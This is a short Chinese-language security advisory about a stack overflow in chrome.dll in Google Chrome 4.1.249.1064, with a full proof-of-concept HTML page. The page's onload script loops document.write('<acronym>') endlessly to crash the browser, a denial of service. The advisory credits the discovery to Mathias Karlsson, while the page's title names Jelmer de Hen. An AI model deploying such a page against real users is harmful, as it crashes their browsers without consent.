受影响系统:
Google Chrome 4.1.249.1064
描述:
Google Chrome是Google发布的开源WEB浏览器。
用户受骗使用Chrome浏览器访问了恶意网页就可以在chrome.dll中触发栈溢出,但最可能导致的结果是拒绝服务。
<*来源:Mathias Karlsson
链接:http://h.ackack.net/?p=323
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!01 <html>
02 <title>Google Chrome remote stack overflow in chrome.dll; published at http://h.ackack.net; found by: Jelmer de Hen</title>
03 <head>
04 <script>
05 // Open it a couple of times, it might not work always; see http://h.ackack.net/?p=323 for more information
06 function pataboom(){
07 while(1){
08 document.write("<acronym>");
09 }
10 }
11 </script>
12 </head>
13 <body onload="pataboom();"></body>
14 </html>
建议:
厂商补丁:
Google
——
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。